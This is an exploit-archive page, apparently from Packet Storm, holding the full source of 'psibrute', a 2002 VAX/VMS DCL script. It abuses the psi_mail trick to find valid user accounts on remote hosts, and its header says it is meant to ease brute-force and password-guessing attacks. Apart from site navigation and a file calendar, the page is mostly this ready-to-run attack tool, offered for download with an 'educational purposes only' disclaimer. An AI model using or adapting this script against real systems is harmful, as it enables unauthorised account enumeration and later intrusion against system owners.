exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

psibrute.com.txt

psibrute.com.txt
Posted Nov 17, 2002
Authored by Marco Ivaldi | Site 0xdeadbeef.info

This DCL script abuses the old psi_mail trick on VAX/VMS systems to remotely find valid users.

systems | vax
SHA-256 | b300bdc9bf7a8a50ee833fcd7c6502f1b542165feca28c88b135ae16d0afbccb

psibrute.com.txt

Change Mirror Download
$!
$! $Id: psibrute.com,v 1.1 2002/10/11 20:00:57 raptor Exp $
$!
$! psibrute v1.0 - VAX/VMS psi_mail remote bruteforcer
$! Copyright (c) 2002 Raptor <raptor@0xdeadbeef.info>
$!
$! PSIBRUTE abuses the old but still effective psi_mail
$! trick on VAX/VMS systems to remotely find valid
$! accounts. It can really simplify bruteforce and/or
$! password-guessing attacks (sending no real mail).
$!
$! Usage: @psibrute <account_file> [<remote_address>]
$! Example: @psibrute vax.txt psi%0208057040540
$!
$! Tested on VAX/VMS V5.5 and OpenVMS V7.2.
$!
$! FOR EDUCATIONAL PURPOSES ONLY.
$!
$
$! Definitions
$ we :== write sys$error
$
$! Parameters and files
$ if P1 .eqs. "" then goto syntax
$ if P2 .eqs. "" then P2 = 0
$ open/read list 'P1'
$ crea psi.tmp
$ open/write log psi.log
$
$ we ""
$ we "*** PSI_BRUTE scanner for VAX/VMS ***"
$ we ""
$
$! Main loop
$ loop:
$ on error then continue
$ on severe_error then continue
$ read list login/end=cleanup
$ define/nolog/user_mode sys$output psi.out
$! We can't simply use "on warning" statement
$! because we don't want to send any real mail
$ mail psi.tmp "NOSUCHUSR", 'P2'::'login'
$
$! A nice trick (2 reads are better than 1)
$ define/nolog/user_mode sys$output sys$error
$ open/read output psi.out
$ read output out
$ read output out/end=found
$ we "[ ] ", login, " is not valid..."
$
$ closeout:
$ close output
$ del psi.out;*
$ goto loop
$
$ found:
$ write log login
$ we "[x] ", login, " is VALID for host ", P2, " !"
$ goto closeout
$
$ cleanup:
$ close list
$ close log
$ del psi.tmp;*
$ we ""
$ we "*** End of remote bruteforce scan ***"
$ we ""
$ exit
$
$ syntax:
$ we "%PSI_BRUTE, error; syntax: @psibrute <account_file> [<remote_address>]"
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close